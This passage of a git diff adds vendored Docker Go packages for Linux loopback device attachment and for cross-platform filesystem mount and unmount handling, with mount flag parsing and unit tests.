+	if !strings.EqualFold(longC, `\\?\C:\simple\path`) {
+		t.Errorf("Wrong long path returned. Original = %s ; Long = %s", c, longC)
+	}
+}
+
+func TestUNCLongPath(t *testing.T) {
+	c := `\\server\share\path`
+	longC := AddPrefix(c)
+	if !strings.EqualFold(longC, `\\?\UNC\server\share\path`) {
+		t.Errorf("Wrong UNC long path returned. Original = %s ; Long = %s", c, longC)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go
new file mode 100644
index 0000000000..971f45eb48
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go
@@ -0,0 +1,137 @@
+// +build linux
+
+package loopback
+
+import (
+	"errors"
+	"fmt"
+	"os"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// Loopback related errors
+var (
+	ErrAttachLoopbackDevice   = errors.New("loopback attach failed")
+	ErrGetLoopbackBackingFile = errors.New("Unable to get loopback backing file")
+	ErrSetCapacity            = errors.New("Unable set loopback capacity")
+)
+
+func stringToLoopName(src string) [LoNameSize]uint8 {
+	var dst [LoNameSize]uint8
+	copy(dst[:], src[:])
+	return dst
+}
+
+func getNextFreeLoopbackIndex() (int, error) {
+	f, err := os.OpenFile("/dev/loop-control", os.O_RDONLY, 0644)
+	if err != nil {
+		return 0, err
+	}
+	defer f.Close()
+
+	index, err := ioctlLoopCtlGetFree(f.Fd())
+	if index < 0 {
+		index = 0
+	}
+	return index, err
+}
+
+func openNextAvailableLoopback(index int, sparseFile *os.File) (loopFile *os.File, err error) {
+	// Start looking for a free /dev/loop
+	for {
+		target := fmt.Sprintf("/dev/loop%d", index)
+		index++
+
+		fi, err := os.Stat(target)
+		if err != nil {
+			if os.IsNotExist(err) {
+				logrus.Error("There are no more loopback devices available.")
+			}
+			return nil, ErrAttachLoopbackDevice
+		}
+
+		if fi.Mode()&os.ModeDevice != os.ModeDevice {
+			logrus.Errorf("Loopback device %s is not a block device.", target)
+			continue
+		}
+
+		// OpenFile adds O_CLOEXEC
+		loopFile, err = os.OpenFile(target, os.O_RDWR, 0644)
+		if err != nil {
+			logrus.Errorf("Error opening loopback device: %s", err)
+			return nil, ErrAttachLoopbackDevice
+		}
+
+		// Try to attach to the loop file
+		if err := ioctlLoopSetFd(loopFile.Fd(), sparseFile.Fd()); err != nil {
+			loopFile.Close()
+
+			// If the error is EBUSY, then try the next loopback
+			if err != syscall.EBUSY {
+				logrus.Errorf("Cannot set up loopback device %s: %s", target, err)
+				return nil, ErrAttachLoopbackDevice
+			}
+
+			// Otherwise, we keep going with the loop
+			continue
+		}
+		// In case of success, we finished. Break the loop.
+		break
+	}
+
+	// This can't happen, but let's be sure
+	if loopFile == nil {
+		logrus.Errorf("Unreachable code reached! Error attaching %s to a loopback device.", sparseFile.Name())
+		return nil, ErrAttachLoopbackDevice
+	}
+
+	return loopFile, nil
+}
+
+// AttachLoopDevice attaches the given sparse file to the next
+// available loopback device. It returns an opened *os.File.
+func AttachLoopDevice(sparseName string) (loop *os.File, err error) {
+
+	// Try to retrieve the next available loopback device via syscall.
+	// If it fails, we discard error and start looping for a
+	// loopback from index 0.
+	startIndex, err := getNextFreeLoopbackIndex()
+	if err != nil {
+		logrus.Debugf("Error retrieving the next available loopback: %s", err)
+	}
+
+	// OpenFile adds O_CLOEXEC
+	sparseFile, err := os.OpenFile(sparseName, os.O_RDWR, 0644)
+	if err != nil {
+		logrus.Errorf("Error opening sparse file %s: %s", sparseName, err)
+		return nil, ErrAttachLoopbackDevice
+	}
+	defer sparseFile.Close()
+
+	loopFile, err := openNextAvailableLoopback(startIndex, sparseFile)
+	if err != nil {
+		return nil, err
+	}
+
+	// Set the status of the loopback device
+	loopInfo := &loopInfo64{
+		loFileName: stringToLoopName(loopFile.Name()),
+		loOffset:   0,
+		loFlags:    LoFlagsAutoClear,
+	}
+
+	if err := ioctlLoopSetStatus64(loopFile.Fd(), loopInfo); err != nil {
+		logrus.Errorf("Cannot set up loopback device info: %s", err)
+
+		// If the call failed, then free the loopback device
+		if err := ioctlLoopClrFd(loopFile.Fd()); err != nil {
+			logrus.Error("Error while cleaning up the loopback device")
+		}
+		loopFile.Close()
+		return nil, ErrAttachLoopbackDevice
+	}
+
+	return loopFile, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go
new file mode 100644
index 0000000000..0714eb5f87
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go
@@ -0,0 +1,53 @@
+// +build linux
+
+package loopback
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+func ioctlLoopCtlGetFree(fd uintptr) (int, error) {
+	index, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, LoopCtlGetFree, 0)
+	if err != 0 {
+		return 0, err
+	}
+	return int(index), nil
+}
+
+func ioctlLoopSetFd(loopFd, sparseFd uintptr) error {
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetFd, sparseFd); err != 0 {
+		return err
+	}
+	return nil
+}
+
+func ioctlLoopSetStatus64(loopFd uintptr, loopInfo *loopInfo64) error {
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 {
+		return err
+	}
+	return nil
+}
+
+func ioctlLoopClrFd(loopFd uintptr) error {
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 {
+		return err
+	}
+	return nil
+}
+
+func ioctlLoopGetStatus64(loopFd uintptr) (*loopInfo64, error) {
+	loopInfo := &loopInfo64{}
+
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopGetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 {
+		return nil, err
+	}
+	return loopInfo, nil
+}
+
+func ioctlLoopSetCapacity(loopFd uintptr, value int) error {
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetCapacity, uintptr(value)); err != 0 {
+		return err
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go
new file mode 100644
index 0000000000..e1100ce156
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go
@@ -0,0 +1,52 @@
+// +build linux
+
+package loopback
+
+/*
+#include <linux/loop.h> // FIXME: present only for defines, maybe we can remove it?
+
+#ifndef LOOP_CTL_GET_FREE
+  #define LOOP_CTL_GET_FREE 0x4C82
+#endif
+
+#ifndef LO_FLAGS_PARTSCAN
+  #define LO_FLAGS_PARTSCAN 8
+#endif
+
+*/
+import "C"
+
+type loopInfo64 struct {
+	loDevice         uint64 /* ioctl r/o */
+	loInode          uint64 /* ioctl r/o */
+	loRdevice        uint64 /* ioctl r/o */
+	loOffset         uint64
+	loSizelimit      uint64 /* bytes, 0 == max available */
+	loNumber         uint32 /* ioctl r/o */
+	loEncryptType    uint32
+	loEncryptKeySize uint32 /* ioctl w/o */
+	loFlags          uint32 /* ioctl r/o */
+	loFileName       [LoNameSize]uint8
+	loCryptName      [LoNameSize]uint8
+	loEncryptKey     [LoKeySize]uint8 /* ioctl w/o */
+	loInit           [2]uint64
+}
+
+// IOCTL consts
+const (
+	LoopSetFd       = C.LOOP_SET_FD
+	LoopCtlGetFree  = C.LOOP_CTL_GET_FREE
+	LoopGetStatus64 = C.LOOP_GET_STATUS64
+	LoopSetStatus64 = C.LOOP_SET_STATUS64
+	LoopClrFd       = C.LOOP_CLR_FD
+	LoopSetCapacity = C.LOOP_SET_CAPACITY
+)
+
+// LOOP consts.
+const (
+	LoFlagsAutoClear = C.LO_FLAGS_AUTOCLEAR
+	LoFlagsReadOnly  = C.LO_FLAGS_READ_ONLY
+	LoFlagsPartScan  = C.LO_FLAGS_PARTSCAN
+	LoKeySize        = C.LO_KEY_SIZE
+	LoNameSize       = C.LO_NAME_SIZE
+)
diff --git a/vendor/github.com/docker/docker/pkg/loopback/loopback.go b/vendor/github.com/docker/docker/pkg/loopback/loopback.go
new file mode 100644
index 0000000000..bc0479284c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/loopback/loopback.go
@@ -0,0 +1,63 @@
+// +build linux
+
+package loopback
+
+import (
+	"fmt"
+	"os"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+)
+
+func getLoopbackBackingFile(file *os.File) (uint64, uint64, error) {
+	loopInfo, err := ioctlLoopGetStatus64(file.Fd())
+	if err != nil {
+		logrus.Errorf("Error get loopback backing file: %s", err)
+		return 0, 0, ErrGetLoopbackBackingFile
+	}
+	return loopInfo.loDevice, loopInfo.loInode, nil
+}
+
+// SetCapacity reloads the size for the loopback device.
+func SetCapacity(file *os.File) error {
+	if err := ioctlLoopSetCapacity(file.Fd(), 0); err != nil {
+		logrus.Errorf("Error loopbackSetCapacity: %s", err)
+		return ErrSetCapacity
+	}
+	return nil
+}
+
+// FindLoopDeviceFor returns a loopback device file for the specified file which
+// is backing file of a loop back device.
+func FindLoopDeviceFor(file *os.File) *os.File {
+	stat, err := file.Stat()
+	if err != nil {
+		return nil
+	}
+	targetInode := stat.Sys().(*syscall.Stat_t).Ino
+	targetDevice := stat.Sys().(*syscall.Stat_t).Dev
+
+	for i := 0; true; i++ {
+		path := fmt.Sprintf("/dev/loop%d", i)
+
+		file, err := os.OpenFile(path, os.O_RDWR, 0)
+		if err != nil {
+			if os.IsNotExist(err) {
+				return nil
+			}
+
+			// Ignore all errors until the first not-exist
+			// we want to continue looking for the file
+			continue
+		}
+
+		dev, inode, err := getLoopbackBackingFile(file)
+		if err == nil && dev == targetDevice && inode == targetInode {
+			return file
+		}
+		file.Close()
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/flags.go b/vendor/github.com/docker/docker/pkg/mount/flags.go
new file mode 100644
index 0000000000..607dbed43a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/flags.go
@@ -0,0 +1,149 @@
+package mount
+
+import (
+	"fmt"
+	"strings"
+)
+
+var flags = map[string]struct {
+	clear bool
+	flag  int
+}{
+	"defaults":      {false, 0},
+	"ro":            {false, RDONLY},
+	"rw":            {true, RDONLY},
+	"suid":          {true, NOSUID},
+	"nosuid":        {false, NOSUID},
+	"dev":           {true, NODEV},
+	"nodev":         {false, NODEV},
+	"exec":          {true, NOEXEC},
+	"noexec":        {false, NOEXEC},
+	"sync":          {false, SYNCHRONOUS},
+	"async":         {true, SYNCHRONOUS},
+	"dirsync":       {false, DIRSYNC},
+	"remount":       {false, REMOUNT},
+	"mand":          {false, MANDLOCK},
+	"nomand":        {true, MANDLOCK},
+	"atime":         {true, NOATIME},
+	"noatime":       {false, NOATIME},
+	"diratime":      {true, NODIRATIME},
+	"nodiratime":    {false, NODIRATIME},
+	"bind":          {false, BIND},
+	"rbind":         {false, RBIND},
+	"unbindable":    {false, UNBINDABLE},
+	"runbindable":   {false, RUNBINDABLE},
+	"private":       {false, PRIVATE},
+	"rprivate":      {false, RPRIVATE},
+	"shared":        {false, SHARED},
+	"rshared":       {false, RSHARED},
+	"slave":         {false, SLAVE},
+	"rslave":        {false, RSLAVE},
+	"relatime":      {false, RELATIME},
+	"norelatime":    {true, RELATIME},
+	"strictatime":   {false, STRICTATIME},
+	"nostrictatime": {true, STRICTATIME},
+}
+
+var validFlags = map[string]bool{
+	"":          true,
+	"size":      true,
+	"mode":      true,
+	"uid":       true,
+	"gid":       true,
+	"nr_inodes": true,
+	"nr_blocks": true,
+	"mpol":      true,
+}
+
+var propagationFlags = map[string]bool{
+	"bind":        true,
+	"rbind":       true,
+	"unbindable":  true,
+	"runbindable": true,
+	"private":     true,
+	"rprivate":    true,
+	"shared":      true,
+	"rshared":     true,
+	"slave":       true,
+	"rslave":      true,
+}
+
+// MergeTmpfsOptions merge mount options to make sure there is no duplicate.
+func MergeTmpfsOptions(options []string) ([]string, error) {
+	// We use collisions maps to remove duplicates.
+	// For flag, the key is the flag value (the key for propagation flag is -1)
+	// For data=value, the key is the data
+	flagCollisions := map[int]bool{}
+	dataCollisions := map[string]bool{}
+
+	var newOptions []string
+	// We process in reverse order
+	for i := len(options) - 1; i >= 0; i-- {
+		option := options[i]
+		if option == "defaults" {
+			continue
+		}
+		if f, ok := flags[option]; ok && f.flag != 0 {
+			// There is only one propagation mode
+			key := f.flag
+			if propagationFlags[option] {
+				key = -1
+			}
+			// Check to see if there is collision for flag
+			if !flagCollisions[key] {
+				// We prepend the option and add to collision map
+				newOptions = append([]string{option}, newOptions...)
+				flagCollisions[key] = true
+			}
+			continue
+		}
+		opt := strings.SplitN(option, "=", 2)
+		if len(opt) != 2 || !validFlags[opt[0]] {
+			return nil, fmt.Errorf("Invalid tmpfs option %q", opt)
+		}
+		if !dataCollisions[opt[0]] {
+			// We prepend the option and add to collision map
+			newOptions = append([]string{option}, newOptions...)
+			dataCollisions[opt[0]] = true
+		}
+	}
+
+	return newOptions, nil
+}
+
+// Parse fstab type mount options into mount() flags
+// and device specific data
+func parseOptions(options string) (int, string) {
+	var (
+		flag int
+		data []string
+	)
+
+	for _, o := range strings.Split(options, ",") {
+		// If the option does not exist in the flags table or the flag
+		// is not supported on the platform,
+		// then it is a data value for a specific fs type
+		if f, exists := flags[o]; exists && f.flag != 0 {
+			if f.clear {
+				flag &= ^f.flag
+			} else {
+				flag |= f.flag
+			}
+		} else {
+			data = append(data, o)
+		}
+	}
+	return flag, strings.Join(data, ",")
+}
+
+// ParseTmpfsOptions parse fstab type mount options into flags and data
+func ParseTmpfsOptions(options string) (int, string, error) {
+	flags, data := parseOptions(options)
+	for _, o := range strings.Split(data, ",") {
+		opt := strings.SplitN(o, "=", 2)
+		if !validFlags[opt[0]] {
+			return 0, "", fmt.Errorf("Invalid tmpfs option %q", opt)
+		}
+	}
+	return flags, data, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go
new file mode 100644
index 0000000000..f166cb2f77
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go
@@ -0,0 +1,48 @@
+// +build freebsd,cgo
+
+package mount
+
+/*
+#include <sys/mount.h>
+*/
+import "C"
+
+const (
+	// RDONLY will mount the filesystem as read-only.
+	RDONLY = C.MNT_RDONLY
+
+	// NOSUID will not allow set-user-identifier or set-group-identifier bits to
+	// take effect.
+	NOSUID = C.MNT_NOSUID
+
+	// NOEXEC will not allow execution of any binaries on the mounted file system.
+	NOEXEC = C.MNT_NOEXEC
+
+	// SYNCHRONOUS will allow any I/O to the file system to be done synchronously.
+	SYNCHRONOUS = C.MNT_SYNCHRONOUS
+
+	// NOATIME will not update the file access time when reading from a file.
+	NOATIME = C.MNT_NOATIME
+)
+
+// These flags are unsupported.
+const (
+	BIND        = 0
+	DIRSYNC     = 0
+	MANDLOCK    = 0
+	NODEV       = 0
+	NODIRATIME  = 0
+	UNBINDABLE  = 0
+	RUNBINDABLE = 0
+	PRIVATE     = 0
+	RPRIVATE    = 0
+	SHARED      = 0
+	RSHARED     = 0
+	SLAVE       = 0
+	RSLAVE      = 0
+	RBIND       = 0
+	RELATIVE    = 0
+	RELATIME    = 0
+	REMOUNT     = 0
+	STRICTATIME = 0
+)
diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go
new file mode 100644
index 0000000000..dc696dce90
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go
@@ -0,0 +1,85 @@
+package mount
+
+import (
+	"syscall"
+)
+
+const (
+	// RDONLY will mount the file system read-only.
+	RDONLY = syscall.MS_RDONLY
+
+	// NOSUID will not allow set-user-identifier or set-group-identifier bits to
+	// take effect.
+	NOSUID = syscall.MS_NOSUID
+
+	// NODEV will not interpret character or block special devices on the file
+	// system.
+	NODEV = syscall.MS_NODEV
+
+	// NOEXEC will not allow execution of any binaries on the mounted file system.
+	NOEXEC = syscall.MS_NOEXEC
+
+	// SYNCHRONOUS will allow I/O to the file system to be done synchronously.
+	SYNCHRONOUS = syscall.MS_SYNCHRONOUS
+
+	// DIRSYNC will force all directory updates within the file system to be done
+	// synchronously. This affects the following system calls: create, link,
+	// unlink, symlink, mkdir, rmdir, mknod and rename.
+	DIRSYNC = syscall.MS_DIRSYNC
+
+	// REMOUNT will attempt to remount an already-mounted file system. This is
+	// commonly used to change the mount flags for a file system, especially to
+	// make a readonly file system writeable. It does not change device or mount
+	// point.
+	REMOUNT = syscall.MS_REMOUNT
+
+	// MANDLOCK will force mandatory locks on a filesystem.
+	MANDLOCK = syscall.MS_MANDLOCK
+
+	// NOATIME will not update the file access time when reading from a file.
+	NOATIME = syscall.MS_NOATIME
+
+	// NODIRATIME will not update the directory access time.
+	NODIRATIME = syscall.MS_NODIRATIME
+
+	// BIND remounts a subtree somewhere else.
+	BIND = syscall.MS_BIND
+
+	// RBIND remounts a subtree and all possible submounts somewhere else.
+	RBIND = syscall.MS_BIND | syscall.MS_REC
+
+	// UNBINDABLE creates a mount which cannot be cloned through a bind operation.
+	UNBINDABLE = syscall.MS_UNBINDABLE
+
+	// RUNBINDABLE marks the entire mount tree as UNBINDABLE.
+	RUNBINDABLE = syscall.MS_UNBINDABLE | syscall.MS_REC
+
+	// PRIVATE creates a mount which carries no propagation abilities.
+	PRIVATE = syscall.MS_PRIVATE
+
+	// RPRIVATE marks the entire mount tree as PRIVATE.
+	RPRIVATE = syscall.MS_PRIVATE | syscall.MS_REC
+
+	// SLAVE creates a mount which receives propagation from its master, but not
+	// vice versa.
+	SLAVE = syscall.MS_SLAVE
+
+	// RSLAVE marks the entire mount tree as SLAVE.
+	RSLAVE = syscall.MS_SLAVE | syscall.MS_REC
+
+	// SHARED creates a mount which provides the ability to create mirrors of
+	// that mount such that mounts and unmounts within any of the mirrors
+	// propagate to the other mirrors.
+	SHARED = syscall.MS_SHARED
+
+	// RSHARED marks the entire mount tree as SHARED.
+	RSHARED = syscall.MS_SHARED | syscall.MS_REC
+
+	// RELATIME updates inode access times relative to modify or change time.
+	RELATIME = syscall.MS_RELATIME
+
+	// STRICTATIME allows to explicitly request full atime updates.  This makes
+	// it possible for the kernel to default to relatime or noatime but still
+	// allow userspace to override it.
+	STRICTATIME = syscall.MS_STRICTATIME
+)
diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go
new file mode 100644
index 0000000000..5564f7b3cd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go
@@ -0,0 +1,30 @@
+// +build !linux,!freebsd freebsd,!cgo solaris,!cgo
+
+package mount
+
+// These flags are unsupported.
+const (
+	BIND        = 0
+	DIRSYNC     = 0
+	MANDLOCK    = 0
+	NOATIME     = 0
+	NODEV       = 0
+	NODIRATIME  = 0
+	NOEXEC      = 0
+	NOSUID      = 0
+	UNBINDABLE  = 0
+	RUNBINDABLE = 0
+	PRIVATE     = 0
+	RPRIVATE    = 0
+	SHARED      = 0
+	RSHARED     = 0
+	SLAVE       = 0
+	RSLAVE      = 0
+	RBIND       = 0
+	RELATIME    = 0
+	RELATIVE    = 0
+	REMOUNT     = 0
+	STRICTATIME = 0
+	SYNCHRONOUS = 0
+	RDONLY      = 0
+)
diff --git a/vendor/github.com/docker/docker/pkg/mount/mount.go b/vendor/github.com/docker/docker/pkg/mount/mount.go
new file mode 100644
index 0000000000..66ac4bf472
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mount.go
@@ -0,0 +1,74 @@
+package mount
+
+import (
+	"time"
+)
+
+// GetMounts retrieves a list of mounts for the current running process.
+func GetMounts() ([]*Info, error) {
+	return parseMountTable()
+}
+
+// Mounted determines if a specified mountpoint has been mounted.
+// On Linux it looks at /proc/self/mountinfo and on Solaris at mnttab.
+func Mounted(mountpoint string) (bool, error) {
+	entries, err := parseMountTable()
+	if err != nil {
+		return false, err
+	}
+
+	// Search the table for the mountpoint
+	for _, e := range entries {
+		if e.Mountpoint == mountpoint {
+			return true, nil
+		}
+	}
+	return false, nil
+}
+
+// Mount will mount filesystem according to the specified configuration, on the
+// condition that the target path is *not* already mounted. Options must be
+// specified like the mount or fstab unix commands: "opt1=val1,opt2=val2". See
+// flags.go for supported option flags.
+func Mount(device, target, mType, options string) error {
+	flag, _ := parseOptions(options)
+	if flag&REMOUNT != REMOUNT {
+		if mounted, err := Mounted(target); err != nil || mounted {
+			return err
+		}
+	}
+	return ForceMount(device, target, mType, options)
+}
+
+// ForceMount will mount a filesystem according to the specified configuration,
+// *regardless* if the target path is not already mounted. Options must be
+// specified like the mount or fstab unix commands: "opt1=val1,opt2=val2". See
+// flags.go for supported option flags.
+func ForceMount(device, target, mType, options string) error {
+	flag, data := parseOptions(options)
+	if err := mount(device, target, mType, uintptr(flag), data); err != nil {
+		return err
+	}
+	return nil
+}
+
+// Unmount will unmount the target filesystem, so long as it is mounted.
+func Unmount(target string) error {
+	if mounted, err := Mounted(target); err != nil || !mounted {
+		return err
+	}
+	return ForceUnmount(target)
+}
+
+// ForceUnmount will force an unmount of the target filesystem, regardless if
+// it is mounted or not.
+func ForceUnmount(target string) (err error) {
+	// Simple retry logic for unmount
+	for i := 0; i < 10; i++ {
+		if err = unmount(target, 0); err == nil {
+			return nil
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go
new file mode 100644
index 0000000000..253aff3b8e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go
@@ -0,0 +1,162 @@
+// +build !windows,!solaris
+
+package mount
+
+import (
+	"os"
+	"path"
+	"testing"
+)
+
+func TestMountOptionsParsing(t *testing.T) {
+	options := "noatime,ro,size=10k"
+
+	flag, data := parseOptions(options)
+
+	if data != "size=10k" {
+		t.Fatalf("Expected size=10 got %s", data)
+	}
+
+	expectedFlag := NOATIME | RDONLY
+
+	if flag != expectedFlag {
+		t.Fatalf("Expected %d got %d", expectedFlag, flag)
+	}
+}
+
+func TestMounted(t *testing.T) {
+	tmp := path.Join(os.TempDir(), "mount-tests")
+	if err := os.MkdirAll(tmp, 0777); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	var (
+		sourceDir  = path.Join(tmp, "source")
+		targetDir  = path.Join(tmp, "target")
+		sourcePath = path.Join(sourceDir, "file.txt")
+		targetPath = path.Join(targetDir, "file.txt")
+	)
+
+	os.Mkdir(sourceDir, 0777)
+	os.Mkdir(targetDir, 0777)
+
+	f, err := os.Create(sourcePath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	f.WriteString("hello")
+	f.Close()
+
+	f, err = os.Create(targetPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	f.Close()
+
+	if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(targetDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	mounted, err := Mounted(targetDir)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !mounted {
+		t.Fatalf("Expected %s to be mounted", targetDir)
+	}
+	if _, err := os.Stat(targetDir); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestMountReadonly(t *testing.T) {
+	tmp := path.Join(os.TempDir(), "mount-tests")
+	if err := os.MkdirAll(tmp, 0777); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	var (
+		sourceDir  = path.Join(tmp, "source")
+		targetDir  = path.Join(tmp, "target")
+		sourcePath = path.Join(sourceDir, "file.txt")
+		targetPath = path.Join(targetDir, "file.txt")
+	)
+
+	os.Mkdir(sourceDir, 0777)
+	os.Mkdir(targetDir, 0777)
+
+	f, err := os.Create(sourcePath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	f.WriteString("hello")
+	f.Close()
+
+	f, err = os.Create(targetPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	f.Close()
+
+	if err := Mount(sourceDir, targetDir, "none", "bind,ro"); err != nil {
+		t.Fatal(err)
+	}
+	defer func() {
+		if err := Unmount(targetDir); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	f, err = os.OpenFile(targetPath, os.O_RDWR, 0777)
+	if err == nil {
+		t.Fatal("Should not be able to open a ro file as rw")
+	}
+}
+
+func TestGetMounts(t *testing.T) {
+	mounts, err := GetMounts()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	root := false
+	for _, entry := range mounts {
+		if entry.Mountpoint == "/" {
+			root = true
+		}
+	}
+
+	if !root {
+		t.Fatal("/ should be mounted at least")
+	}
+}
+
+func TestMergeTmpfsOptions(t *testing.T) {
+	options := []string{"noatime", "ro", "size=10k", "defaults", "atime", "defaults", "rw", "rprivate", "size=1024k", "slave"}
+	expected := []string{"atime", "rw", "size=1024k", "slave"}
+	merged, err := MergeTmpfsOptions(options)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(expected) != len(merged) {
+		t.Fatalf("Expected %s got %s", expected, merged)
+	}
+	for index := range merged {
+		if merged[index] != expected[index] {
+			t.Fatalf("Expected %s for the %dth option, got %s", expected, index, merged)
+		}
+	}
+
+	options = []string{"noatime", "ro", "size=10k", "atime", "rw", "rprivate", "size=1024k", "slave", "size"}
+	_, err = MergeTmpfsOptions(options)
+	if err == nil {
+		t.Fatal("Expected error got nil")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go
new file mode 100644
index 0000000000..bb870e6f59
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go
@@ -0,0 +1,59 @@
+package mount
+
+/*
+#include <errno.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/_iovec.h>
+#include <sys/mount.h>
+#include <sys/param.h>
+*/
+import "C"
+
+import (
+	"fmt"
+	"strings"
+	"syscall"
+	"unsafe"
+)
+
+func allocateIOVecs(options []string) []C.struct_iovec {
+	out := make([]C.struct_iovec, len(options))
+	for i, option := range options {
+		out[i].iov_base = unsafe.Pointer(C.CString(option))
+		out[i].iov_len = C.size_t(len(option) + 1)
+	}
+	return out
+}
+
+func mount(device, target, mType string, flag uintptr, data string) error {
+	isNullFS := false
+
+	xs := strings.Split(data, ",")
+	for _, x := range xs {
+		if x == "bind" {
+			isNullFS = true
+		}
+	}
+
+	options := []string{"fspath", target}
+	if isNullFS {
+		options = append(options, "fstype", "nullfs", "target", device)
+	} else {
+		options = append(options, "fstype", mType, "from", device)
+	}
+	rawOptions := allocateIOVecs(options)
+	for _, rawOption := range rawOptions {
+		defer C.free(rawOption.iov_base)
+	}
+
+	if errno := C.nmount(&rawOptions[0], C.uint(len(options)), C.int(flag)); errno != 0 {
+		reason := C.GoString(C.strerror(*C.__error()))
+		return fmt.Errorf("Failed to call nmount: %s", reason)
+	}
+	return nil
+}
+
+func unmount(target string, flag int) error {
+	return syscall.Unmount(target, flag)
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go
new file mode 100644
index 0000000000..dd4280c777
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go
@@ -0,0 +1,21 @@
+package mount
+
+import (
+	"syscall"
+)
+
+func mount(device, target, mType string, flag uintptr, data string) error {
+	if err := syscall.Mount(device, target, mType, flag, data); err != nil {
+		return err
+	}
+
+	// If we have a bind mount or remount, remount...
+	if flag&syscall.MS_BIND == syscall.MS_BIND && flag&syscall.MS_RDONLY == syscall.MS_RDONLY {
+		return syscall.Mount(device, target, mType, flag|syscall.MS_REMOUNT, data)
+	}
+	return nil
+}
+
+func unmount(target string, flag int) error {
+	return syscall.Unmount(target, flag)
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go
new file mode 100644
index 0000000000..c684aa81fc
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go
@@ -0,0 +1,33 @@
+// +build solaris,cgo
+
+package mount
+
+import (
+	"golang.org/x/sys/unix"
+	"unsafe"
+)
+
+// #include <stdlib.h>
+// #include <stdio.h>
+// #include <sys/mount.h>
+// int Mount(const char *spec, const char *dir, int mflag,
+// char *fstype, char *dataptr, int datalen, char *optptr, int optlen) {
+//     return mount(spec, dir, mflag, fstype, dataptr, datalen, optptr, optlen);
+// }
+import "C"
+
+func mount(device, target, mType string, flag uintptr, data string) error {
+	spec := C.CString(device)
+	dir := C.CString(target)
+	fstype := C.CString(mType)
+	_, err := C.Mount(spec, dir, C.int(flag), fstype, nil, 0, nil, 0)
+	C.free(unsafe.Pointer(spec))
+	C.free(unsafe.Pointer(dir))
+	C.free(unsafe.Pointer(fstype))
+	return err
+}
+
+func unmount(target string, flag int) error {
+	err := unix.Unmount(target, flag)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go
new file mode 100644
index 0000000000..a2a3bb457f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go
@@ -0,0 +1,11 @@
+// +build !linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo
+
+package mount
+
